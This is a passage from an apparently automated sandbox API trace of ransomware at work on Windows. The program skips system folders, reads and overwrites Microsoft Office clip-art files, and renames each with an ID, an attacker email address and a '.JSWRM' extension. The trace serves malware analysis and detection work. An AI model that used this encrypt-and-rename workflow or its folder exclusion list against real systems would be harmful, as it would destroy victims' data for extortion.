(lpString1="TN00218_.WMF", lpString2="perflogs") returned 1 [0098.610] lstrcmpiW (lpString1="TN00218_.WMF", lpString2="documents and settings") returned 1 [0098.610] lstrcmpiW (lpString1="TN00218_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.610] lstrcmpiW (lpString1="TN00218_.WMF", lpString2="system volume information") returned 1 [0098.610] lstrcmpiW (lpString1="TN00218_.WMF", lpString2="msocache") returned 1 [0098.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0098.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00218_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00218_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00218_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0098.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0098.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00218_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00218_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00218_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0098.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0098.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0098.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0098.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.611] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7104) returned 1 [0098.612] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1bc0) returned 0x205850 [0098.612] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1bc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1bc0, lpOverlapped=0x0) returned 1 [0098.613] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.614] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1bc0, lpOverlapped=0x0) returned 1 [0098.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.614] CloseHandle (hObject=0x314) returned 1 [0098.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0098.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0098.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0098.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0098.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0098.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0098.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00218_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00218_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0098.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0098.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0098.618] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x738, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00231_.WMF", cAlternateFileName="")) returned 1 [0098.618] lstrcmpiW (lpString1="TN00231_.WMF", lpString2=".") returned 1 [0098.618] lstrcmpiW (lpString1="TN00231_.WMF", lpString2="..") returned 1 [0098.618] lstrcmpiW (lpString1="TN00231_.WMF", lpString2="...") returned 1 [0098.618] lstrcmpiW (lpString1="TN00231_.WMF", lpString2="windows") returned -1 [0098.618] lstrcmpiW (lpString1="TN00231_.WMF", lpString2="recovery") returned 1 [0098.618] lstrcmpiW (lpString1="TN00231_.WMF", lpString2="perflogs") returned 1 [0098.618] lstrcmpiW (lpString1="TN00231_.WMF", lpString2="documents and settings") returned 1 [0098.618] lstrcmpiW (lpString1="TN00231_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.618] lstrcmpiW (lpString1="TN00231_.WMF", lpString2="system volume information") returned 1 [0098.618] lstrcmpiW (lpString1="TN00231_.WMF", lpString2="msocache") returned 1 [0098.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0098.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00231_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00231_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00231_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0098.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0098.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00231_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00231_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00231_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0098.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0098.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0098.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0098.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00231_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.619] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1848) returned 1 [0098.619] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x730) returned 0x20c6c0 [0098.619] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x730, lpOverlapped=0x0) returned 1 [0098.621] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.621] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x730, lpOverlapped=0x0) returned 1 [0098.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0098.621] CloseHandle (hObject=0x314) returned 1 [0098.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0098.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0098.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0098.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0098.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0098.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0098.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0098.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0098.622] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00231_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00231_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0098.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0098.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0098.622] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc68, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00234_.WMF", cAlternateFileName="")) returned 1 [0098.622] lstrcmpiW (lpString1="TN00234_.WMF", lpString2=".") returned 1 [0098.622] lstrcmpiW (lpString1="TN00234_.WMF", lpString2="..") returned 1 [0098.622] lstrcmpiW (lpString1="TN00234_.WMF", lpString2="...") returned 1 [0098.623] lstrcmpiW (lpString1="TN00234_.WMF", lpString2="windows") returned -1 [0098.623] lstrcmpiW (lpString1="TN00234_.WMF", lpString2="recovery") returned 1 [0098.623] lstrcmpiW (lpString1="TN00234_.WMF", lpString2="perflogs") returned 1 [0098.623] lstrcmpiW (lpString1="TN00234_.WMF", lpString2="documents and settings") returned 1 [0098.623] lstrcmpiW (lpString1="TN00234_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.623] lstrcmpiW (lpString1="TN00234_.WMF", lpString2="system volume information") returned 1 [0098.623] lstrcmpiW (lpString1="TN00234_.WMF", lpString2="msocache") returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0098.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00234_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00234_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00234_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0098.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00234_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00234_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00234_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0098.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0098.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0098.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.624] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3176) returned 1 [0098.624] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc60) returned 0x23fc98 [0098.624] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xc60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xc60, lpOverlapped=0x0) returned 1 [0098.626] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.626] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xc60, lpOverlapped=0x0) returned 1 [0098.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0098.626] CloseHandle (hObject=0x314) returned 1 [0098.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0098.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0098.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0098.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0098.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0098.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0098.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.626] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00234_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00234_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0098.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0098.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0098.627] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf8c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00241_.WMF", cAlternateFileName="")) returned 1 [0098.627] lstrcmpiW (lpString1="TN00241_.WMF", lpString2=".") returned 1 [0098.627] lstrcmpiW (lpString1="TN00241_.WMF", lpString2="..") returned 1 [0098.627] lstrcmpiW (lpString1="TN00241_.WMF", lpString2="...") returned 1 [0098.627] lstrcmpiW (lpString1="TN00241_.WMF", lpString2="windows") returned -1 [0098.627] lstrcmpiW (lpString1="TN00241_.WMF", lpString2="recovery") returned 1 [0098.628] lstrcmpiW (lpString1="TN00241_.WMF", lpString2="perflogs") returned 1 [0098.628] lstrcmpiW (lpString1="TN00241_.WMF", lpString2="documents and settings") returned 1 [0098.628] lstrcmpiW (lpString1="TN00241_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.628] lstrcmpiW (lpString1="TN00241_.WMF", lpString2="system volume information") returned 1 [0098.628] lstrcmpiW (lpString1="TN00241_.WMF", lpString2="msocache") returned 1 [0098.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0098.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00241_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00241_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00241_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0098.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0098.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00241_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00241_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00241_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0098.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: 